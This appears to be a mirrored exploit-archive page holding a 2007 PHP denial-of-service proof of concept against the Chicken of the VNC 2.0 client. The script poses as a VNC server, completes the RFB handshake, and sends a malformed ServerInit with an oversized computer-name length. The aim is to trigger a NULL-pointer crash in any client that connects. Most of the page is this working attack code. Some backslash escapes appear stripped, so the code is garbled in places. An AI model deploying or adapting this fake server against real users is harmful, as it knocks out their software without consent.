Chicken of the VNC 2.0 (NULL-pointer) Remote Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Chicken of the VNC 2.0 (NULL-pointer) Remote Denial of Service Exploit
# Published : 2007-02-02
# Author : poplix
# Previous Title : Remotesoft .NET Explorer 2.0.1 Local Stack Overflow PoC
# Next Title : CA BrightStor ARCserve 11.5.2.0 (catirpc.dll) RPC Server DoS Exploit

<?
$port = "5900";

$BadServerInit=
"x04x00".                                     // fb-width
"x03x00".                                     // fb-hight
"x20".                                         // bits per pixel
"x18".                                         // depth
"x00".                                         // big-endian flag
"x01".                                         // true-color flag
"x00xffx00xffx00xff". 			// r-g-b max
"x10x08x00".                         	// r-g-b shift
"x00x00x00".                         	// padding
"xffxffxffxff".                     	// computer-name size
"DIE_PLZ";                                      // computer-name


$ser = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_set_option($ser,SOL_SOCKET,SO_REUSEADDR,1);
socket_bind($ser,"0.0.0.0", $port);

socket_listen($ser, 5);

print "this fake vnc server will crash cotv2.0 (http://sourceforge.net/projects/cotvnc/) due to a NULL-pointer dereference 02-02-2007   poplix [@] papuasia.org listening on $port ...n";

$cotv = socket_accept($ser);
print "client connectedn";

socket_write($cotv, "RFB 00 3.008n");
while($i=socket_read($cotv, 1024))
       if(substr($i,0,6) == "RFB 00") break;


print "protocol has been negotiatedn";

socket_write($cotv, "x00x00x00x01");
while($i=socket_read($cotv, 1024))
       if(ord($i[0])==0 || ord($i[0])==1)break;

print "sending expl...n";

socket_write($cotv, $BadServerInit);


socket_close($cotv);

socket_close($ser);

print "donen";
?>

# www.Syue.com [2007-02-02]